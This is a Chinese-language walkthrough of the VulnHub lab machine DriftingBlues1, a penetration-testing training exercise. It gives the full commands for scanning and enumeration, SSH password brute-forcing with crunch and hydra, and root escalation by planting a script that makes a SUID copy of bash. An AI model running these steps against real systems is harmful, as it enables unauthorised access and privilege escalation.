靶机渗透练习01-driftingblues1

靶机地址： https://www.vulnhub.com/entry/driftingblues-1,625/

1、主机探活

arp-scan -I eth0 -l （指定网卡扫）
masscan 192.168.184.0/24 -p 80,22
netdiscover -i eth0 -r 192.168.184.0/24

2、端口扫描

nmap -A -sV -T4 -p- 192.168.111.8

3、访问80端口，遇事不决，目录扫描来一波

gobuster dir -u “http://192.168.111.8/” -w /root/tools/directory-list-2.3-medium.txt -x php,html,txt,zip

然而并没有什么特殊的发现。网站首页一大段英文，仔细一看，有两个邮箱信息

sheryl@driftingblues.box
eric@driftingblues.box

4、好像到这就断住了，查看网页源代码，有新的发现

base64解码得到

/noteforkingfish.txt

访问后发现是Ook编码，拿去解码得到如下

my man, i know you are new but you should know how to use host file to reach our secret location. -eric
（我的人，我知道你是新来的，但你应该知道如何使用主机文件到达我们的秘密位置-埃里克）

5、提示很明显， 本地dns解析

vim /etc/hosts

但是加入后访问和原来的一样，看到提示中有host file，考虑可能需要添加子域名
6、使用gobuster进行域名扫描

gobuster vhost -u driftingblues.box -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt | grep “Status: 200”

继续添加到hosts中

7、访问子域后出现如下

我们继续目录扫描

gobuster dir -u “http://test.driftingblues.box/” -w /root/tools/directory-list-2.3-medium.txt -x php,html,txt,zip

ok看到了robots.txt文件，访问后

8、发现一个文件： ssh_cred.txt

we can use ssh password in case of emergency. it was “1mw4ckyyucky”.
sheryl once told me that she added a number to the end of the password.
-db

提示信息给出了ssh的密码为1mw4ckyyucky（12位）加上一个数字，我们就可以使用crunch命令生成字典进行爆破

crunch 13 13 -t 1mw4ckyyucky% > password.txt

9、ssh爆破与连接

hydra -l eric -P password.txt 192.168.111.8 ssh

ssh eric@192.168.111.8

10、提权尝试

使用sudo -l命令查看到eric用户无权限执行任何sudo,也没有定时任务，suid文件也没发现

sudo -l
crontab -l
find / -perm -u=s -type f 2>/dev/null

只能在靶机内部尝试找到存在root权限执行的文件或者脚本.
四处翻找文件，根据提示找到了一个bash文件

发现backup.sh文件中执行的命令是root权限的.并且文件中直接提示说有一个backdoor,发现后面用sudo执行了/tmp/emergency文件,查看tmp目录,发现并没有该文件,于是我们创建一个名为emergency的文件
系统会执行backup.sh，以root权限执行emergency，在该文件中执行的命令就是root权限，可以把/bin/bash复制到tmp目录中，添加suid权限

echo ‘cp /bin/bash /tmp/getroot; chmod +s /tmp/getroot’ > /tmp/emergency
chmod +x emergency
./getroot -p

然后等待backup.sh文件执行,sudo命令执行emergency，生成getroot文件，具有suid权限,然后执行文件./getroot -p就可以获得root权限

完结散花~

参考：https://blog.csdn.net/weixin_53786084/article/details/121539579
https://www.freebuf.com/articles/others-articles/279073.html
https://blog.csdn.net/liver100day/article/details/119057950